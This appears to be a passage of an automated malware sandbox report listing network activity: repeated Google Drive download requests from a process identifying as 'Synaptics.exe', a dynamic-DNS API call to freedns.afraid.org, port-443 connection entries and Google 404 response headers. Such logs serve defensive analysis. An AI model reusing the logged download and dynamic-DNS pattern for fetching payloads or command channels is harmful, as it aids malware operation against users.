                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
